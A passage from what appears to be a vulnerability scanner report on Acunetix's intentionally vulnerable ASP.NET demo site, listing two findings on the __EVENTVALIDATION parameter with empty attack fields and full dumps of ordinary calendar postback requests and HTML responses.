parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__EVENTVALIDATION
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1163 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,163 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8155&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBABYkFK9oIHgJTRBYBBgCAm148KtoIZGRkrTg1M5dd7DJfkuTq62%2FvJVuS9aU%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwLP6Y6kBQK645OfAwK746uPDAL7pOHDAgL7pOHDAgLcy%2FPoBQLcy%2FPoBQLcy%2BePDQLcy%2BePDQLcy5uiBgLcy5uiBgLcy4%2F5DwLcy4%2F5DwLcy6OcBwLcy6OcBwLcy9cwAtzL1zAC3MvL1wkC3MvL1wkC3Mv%2F6gIC3Mv%2F6gIC3MvT0w8C3MvT0w8C3MvH9ggC3MvH9ggCsdLRnwoCsdLRnwoCsdLFsgMCsdLFsgMCsdL5yQwCsdL5yQwCsdLt7AUCsdLt7AUCsdKBgw0CsdKBgw0CsdK1pgYCsdK1pgYCsdKp%2FQ8CsdKp%2FQ8CsdLdkQcCsdLdkQcCsdKx%2BQUCsdKx%2BQUCsdKlnA0CsdKlnA0Civm3BQKK%2BbcFAor5q9gJAor5q9gJAor53%2FwCAor53%2FwCAor585MKAor585MKAor557YDAor557YDAor5m80MAor5m80MAor5j%2BAFAor5j%2BAFAor5o4cNAor5o4cNAor5l%2BwLAor5l%2BwLAor5i4MDAor5i4MDAr%2BT98QJAr%2BT98QJAr%2BT65sBAr%2BT65sBAr%2BTn74KAr%2BTn74KAr%2BTs9UDAr%2BTs9UDAr%2BTp%2BgMAr%2BTp%2BgMAr%2BT24wEAr%2BT24wEAr%2BTz6MNAr%2BTz6MNAr%2BT48YGAr%2BT48YGAr%2BT168DAr%2BT168DAr%2BTy8IMAr%2BTy8IMApC61esPApC61esPKcn5Q0e6r1exf1k5a2PbAwyFotI%3D
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:55:46 GMT Content-Length: 12431
Response Body - size: 12,431 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBABYkFK9oIHgJTRBYBBgCAm148KtoIZGRkrTg1M5dd7DJfkuTq62/vJVuS9aU=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLP6Y6kBQK645OfAwK746uPDAL7pOHDAgL7pOHDAgLcy/PoBQLcy/PoBQLcy+ePDQLcy+ePDQLcy5uiBgLcy5uiBgLcy4/5DwLcy4/5DwLcy6OcBwLcy6OcBwLcy9cwAtzL1zAC3MvL1wkC3MvL1wkC3Mv/6gIC3Mv/6gIC3MvT0w8C3MvT0w8C3MvH9ggC3MvH9ggCsdLRnwoCsdLRnwoCsdLFsgMCsdLFsgMCsdL5yQwCsdL5yQwCsdLt7AUCsdLt7AUCsdKBgw0CsdKBgw0CsdK1pgYCsdK1pgYCsdKp/Q8CsdKp/Q8CsdLdkQcCsdLdkQcCsdKx+QUCsdKx+QUCsdKlnA0CsdKlnA0Civm3BQKK+bcFAor5q9gJAor5q9gJAor53/wCAor53/wCAor585MKAor585MKAor557YDAor557YDAor5m80MAor5m80MAor5j+AFAor5j+AFAor5o4cNAor5o4cNAor5l+wLAor5l+wLAor5i4MDAor5i4MDAr+T98QJAr+T98QJAr+T65sBAr+T65sBAr+Tn74KAr+Tn74KAr+Ts9UDAr+Ts9UDAr+Tp+gMAr+Tp+gMAr+T24wEAr+T24wEAr+Tz6MNAr+Tz6MNAr+T48YGAr+T48YGAr+T168DAr+T168DAr+Ty8IMAr+Ty8IMApC61esPApC61esPKcn5Q0e6r1exf1k5a2PbAwyFotI=" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8126')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">May 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8187')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8149')" style="color:Black" title="April 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8150')" style="color:Black" title="April 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8151')" style="color:Black" title="April 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8152')" style="color:Black" title="April 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8153')" style="color:Black" title="April 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8154')" style="color:Black" title="April 29">29</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8155')" style="color:White" title="April 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8156')" style="color:Black" title="May 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8157')" style="color:Black" title="May 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8158')" style="color:Black" title="May 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8159')" style="color:Black" title="May 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8160')" style="color:Black" title="May 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8161')" style="color:Black" title="May 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8162')" style="color:Black" title="May 07">7</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8163')" style="color:Black" title="May 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8164')" style="color:Black" title="May 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8165')" style="color:Black" title="May 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8166')" style="color:Black" title="May 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8167')" style="color:Black" title="May 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8168')" style="color:Black" title="May 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8169')" style="color:Black" title="May 14">14</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8170')" style="color:Black" title="May 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8171')" style="color:Black" title="May 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8172')" style="color:Black" title="May 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8173')" style="color:Black" title="May 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8174')" style="color:Black" title="May 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8175')" style="color:Black" title="May 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8176')" style="color:Black" title="May 21">21</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8177')" style="color:Black" title="May 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8178')" style="color:Black" title="May 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8179')" style="color:Black" title="May 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8180')" style="color:Black" title="May 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8181')" style="color:Black" title="May 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8182')" style="color:Black" title="May 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8183')" style="color:Black" title="May 28">28</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8184')" style="color:Black" title="May 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8185')" style="color:Black" title="May 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8186')" style="color:Black" title="May 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8187')" style="color:Black" title="June 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8188')" style="color:Black" title="June 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8189')" style="color:Black" title="June 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8190')" style="color:Black" title="June 04">4</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__EVENTVALIDATION
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1161 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,161 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8265&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBABsdQc9oIHgJTRBYBBgAADJisgNoIZGRkK5xATH0N1T2ZNNl0f8q%2FrvSTpZ0%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwLPj5iiDgKcisLvAQLiidrKBQL7pJ3HDAL7pJ3HDAL7pPGsCQL7pPGsCQL7pOXDAgL7pOXDAgLcy%2FfoBQLcy%2FfoBQLcy%2BuPDQLcy%2BuPDQLcy5%2BiBgLcy5%2BiBgLcy7P5DwLcy7P5DwLcy6ecBwLcy6ecBwLcy9swAtzL2zAC3MvP1wkC3MvP1wkC3Mvj6gIC3Mvj6gIC3MvX0w8C3MvX0w8C3MvL9ggC3MvL9ggCsdLVnwoCsdLVnwoCsdLJsgMCsdLJsgMCsdL9yQwCsdL9yQwCsdKR7AUCsdKR7AUCsdKFgw0CsdKFgw0CsdK5pgYCsdK5pgYCsdKt%2FQ8CsdKt%2FQ8CsdLBkQcCsdLBkQcCsdK1%2BQUCsdK1%2BQUCsdKpnA0CsdKpnA0Civm7BQKK%2BbsFAor5r9gJAor5r9gJAor5w%2FwCAor5w%2FwCAor595MKAor595MKAor567YDAor567YDAor5n80MAor5n80MAor5s%2BAFAor5s%2BAFAor5p4cNAor5p4cNAor5m%2BwLAor5m%2BwLAor5j4MDAor5j4MDAr%2BT%2B8QJAr%2BT%2B8QJAr%2BT75sBAr%2BT75sBAr%2BTg74KAr%2BTg74KAr%2BTt9UDAr%2BTt9UDAr%2BTq%2BgMAr%2BTq%2BgMAr%2BT34wEAr%2BT34wEAr%2BT86MNAr%2BT86MNAr%2BT58YGAr%2BT58YGAr%2BT268DAr%2BT268D%2FGuXkYtuYqJWaPlQxJzAfpf1MQE%3D
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:29:31 GMT Content-Length: 12565
Response Body - size: 12,565 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBABsdQc9oIHgJTRBYBBgAADJisgNoIZGRkK5xATH0N1T2ZNNl0f8q/rvSTpZ0=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLPj5iiDgKcisLvAQLiidrKBQL7pJ3HDAL7pJ3HDAL7pPGsCQL7pPGsCQL7pOXDAgL7pOXDAgLcy/foBQLcy/foBQLcy+uPDQLcy+uPDQLcy5+iBgLcy5+iBgLcy7P5DwLcy7P5DwLcy6ecBwLcy6ecBwLcy9swAtzL2zAC3MvP1wkC3MvP1wkC3Mvj6gIC3Mvj6gIC3MvX0w8C3MvX0w8C3MvL9ggC3MvL9ggCsdLVnwoCsdLVnwoCsdLJsgMCsdLJsgMCsdL9yQwCsdL9yQwCsdKR7AUCsdKR7AUCsdKFgw0CsdKFgw0CsdK5pgYCsdK5pgYCsdKt/Q8CsdKt/Q8CsdLBkQcCsdLBkQcCsdK1+QUCsdK1+QUCsdKpnA0CsdKpnA0Civm7BQKK+bsFAor5r9gJAor5r9gJAor5w/wCAor5w/wCAor595MKAor595MKAor567YDAor567YDAor5n80MAor5n80MAor5s+AFAor5s+AFAor5p4cNAor5p4cNAor5m+wLAor5m+wLAor5j4MDAor5j4MDAr+T+8QJAr+T+8QJAr+T75sBAr+T75sBAr+Tg74KAr+Tg74KAr+Tt9UDAr+Tt9UDAr+Tq+gMAr+Tq+gMAr+T34wEAr+T34wEAr+T86MNAr+T86MNAr+T58YGAr+T58YGAr+T268DAr+T268D/GuXkYtuYqJWaPlQxJzAfpf1MQE=" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8217')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">August 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8279')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8247')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8248')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8249')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8250')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8251')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8252')" style="color:Black" title="August 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8253')" style="color:Black" title="August 06">6</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8254')" style="color:Black" title="August 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8255')" style="color:Black" title="August 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8256')" style="color:Black" title="August 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8257')" style="color:Black" title="August 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8258')" style="color:Black" title="August 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8259')" style="color:Black" title="August 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8260')" style="color:Black" title="August 13">13</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8261')" style="color:Black" title="August 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8262')" style="color:Black" title="August 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8263')" style="color:Black" title="August 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8264')" style="color:Black" title="August 17">17</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8265')" style="color:White" title="August 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8266')" style="color:Black" title="August 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8267')" style="color:Black" title="August 20">20</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8268')" style="color:Black" title="August 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8269')" style="color:Black" title="August 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8270')" style="color:Black" title="August 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8271')" style="color:Black" title="August 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8272')" style="color:Black" title="August 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8273')" style="color:Black" title="August 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8274')" style="color:Black" title="August 27">27</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8275')" style="color:Black" title="August 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8276')" style="color:Black" title="August 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8277')" style="color:Black" title="August 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8278')" style="color:Black" title="August 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8279')" style="color:Black" title="September 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8280')" style="color:Black" title="September 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8281')" style="color:Black" title="September 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8282')" style="color:Black" title="September 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8283')" style="color:Black" title="September 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8284')" style="color:Black" title="September 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8285')" style="color:Black" title="September 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8286')" style="color:Black" title="September 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8287')" style="color:Black" title="September 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8288')" style="color:Black" title="September 10">10</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the 